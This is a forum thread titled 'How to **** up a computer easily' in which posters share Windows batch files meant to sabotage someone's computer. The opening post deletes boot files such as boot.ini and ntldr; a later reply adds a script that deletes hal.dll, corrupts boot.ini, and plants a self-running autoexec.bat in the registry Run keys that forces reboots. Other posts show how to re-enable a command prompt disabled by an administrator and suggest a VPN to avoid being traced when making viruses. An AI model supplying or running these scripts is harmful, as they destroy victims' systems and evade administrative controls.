Post: How to **** up a computer easily
01-22-2011, 10:37 PM #1
(adsbygoogle = window.adsbygoogle || []).push({}); Put that in notepad and save as a .bat file.

    @echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini


This will shut down the person's computer and delete all the files needed for restart.
(adsbygoogle = window.adsbygoogle || []).push({});
01-28-2011, 03:32 AM #11
Repsys7
Error… Cat invasion!
Does this BSOD? and is it fixable?
01-28-2011, 03:39 AM #12
Cain
Tutorial Team Like A Boss
Actually now that I think about it all that code does is delete's your boot data, all you gotta do is insert your Windows Recovery Disc and repair the bootup. Problem solved. Smile
02-01-2011, 05:37 AM #13
Repsys7
Error… Cat invasion!
I just keep getting file not found for everything :(
02-01-2011, 09:26 AM #14
Ups.
Do a barrel roll!
look if you guys are in to makeing virus your going to need vpn or some thing thing like that so win they give the pc to like microsoft it cant be traced to you.



plz dont for get to rep
02-01-2011, 11:08 AM #15
Ghost1990
12-28-2012
Originally posted by Wiz
Put that in notepad and save as a .bat file.

    @echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini


This will shut down the person's computer and delete all the files needed for restart.


What I've also done
    
DEL /F /Q %systemroot%\system32\hal.dll

well, that was for windows XP atleast, and if I remember correctly, fixing the boot didn't fix that problem, neither did just replacing the file deleted with the old one, I think I had to reinstall the OS. Not sure though.
    ATTRIB -R -A -S -H %SYSTEMDRIVE%\boot.ini
DEL /F /Q %SYSTEMDRIVE%\boot.ini
DEL /F /Q %SYSTEMROOT%\system32\hal.dll
ECHO [boot loader]>%SYSTEMDRIVE%\boot.ini
ECHO timeout=10>>%SYSTEMDRIVE%\boot.ini
ECHO default=multi(1)disk(2)rdisk(3)partition(4)\WINDOWS>>%SYSTEMDRIVE%\boot.ini
ECHO [operating systems]>>%SYSTEMDRIVE%\boot.ini
ECHO multi(5)disk(6)rdisk(7)partition(Cool Man (aka Tustin)\WINDOWS="OWNED" /noexecute=optin /fastdetect>>%SYSTEMDRIVE%\boot.ini
ATTRIB +R +A +S +H %SYSTEMDRIVE%\boot.ini
CLS
ECHO @ECHO OFF>%SYSTEMROOT%\autoexec.bat
ECHO BREAK OFF>>%SYSTEMROOT%\autoexec.bat
ECHO IPCONFIG /RELEASE /ALL>>%SYSTEMROOT%\autoexec.bat
ECHO DEL /F /Q %SYSTEMROOT%\System32\hal.dll>>%SYSTEMROOT%\autoexec.bat
ECHO SHUTDOWN -C "Unplanned System Reconfiguration" -R -F -T 03>>%SYSTEMROOT%\autoexec.bat
ECHO CLS>>%SYSTEMROOT%\autoexec.bat
CLS
REG ADD HKLM\software\microsoft\windows\currentversion\run /V WINDOWSAPI /T reg_sz /D %SYSTEMROOT%\autoexec.bat /F
REG ADD HKCU\software\microsoft\windows\currentversion\run /V CONTROLexit /T reg_sz /D %SYSTEMROOT%\autoexec.bat /F
SHUTDOWN -C "Unplanned System Reconfiguration" -R -F -T 03
EXIT
another batch file I used to use
And for those of you that have the command prompt has been disabled by your administrator, if you can, press start->run and copy this in and press enter
    REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f
02-01-2011, 05:43 PM #16
Originally posted by Tundmatu View Post
The easier way to **** up a computer

You must login or register to view this content.


hehehe lol that just made my night Smile
02-02-2011, 12:12 PM #17
Repsys7
Error… Cat invasion!
If I replace the HDD will that fix it? Asus is doing that to my laptop now!

I hope it doesnt work :P

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo